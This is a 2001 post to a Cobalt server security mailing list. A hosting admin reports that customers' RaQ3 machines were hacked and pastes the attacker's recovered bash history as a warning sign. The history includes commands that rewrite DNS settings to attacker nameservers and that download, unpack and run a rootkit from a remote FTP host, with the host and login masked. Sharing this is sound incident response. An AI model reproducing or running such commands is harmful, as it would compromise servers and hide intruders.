[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] A hacker at work
- Subject: [cobalt-security] A hacker at work
- From: Gordon Mcdowall <gordon.mcdowall@xxxxxxxxxxx>
- Date: Fri, 15 Jun 2001 16:41:17 +0100
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Just for information, a couple of our customers raq3s were hacked last
night, quite a nasty little hack (installs Koh roottools). If you suspect
the same then check the .bash_history file in the root directory...this is
what we had in there
(lddj]ge}xxCJ~=J'(~wBLp
./2%6ldj]ge}xxCJ~=J(~wBLpt{kL'*x9B
(lddj]ge}xxCJ~=J'(~wBLp
./2%6ldj]ge}xxCJ~=J(~wBLpt{kL'*x9B
(lddj]ge}xxCJ~=J'(~wBLp
./2%6ldj]ge}xxCJ~=J(~wBLpt{kL'*x9B
ifcofnig -a
echo "nameserver 205.136.127.200" > /etc/resolv.conf;
echo "nameserver 207.126.96.162" >> /etc/resolv.conf;
echo "nameserver 208.231.1.34" >> /etc/resolv.conf;
cd /tmp; export TERM=vt100; lynx -dump
ftp://xxxx:xxxxx@xxxxxxxxxxxxx/www/n/nk.tgz > nk.tgz; tar -xvzf nk.tgz; cd
rk 2>&1; ./ps 2>&1
./install2
I have hashed out the ftp bit, but the guy left us with his ftp login and
password so we are dealing with him in our own way ;o)
Regards
Gordon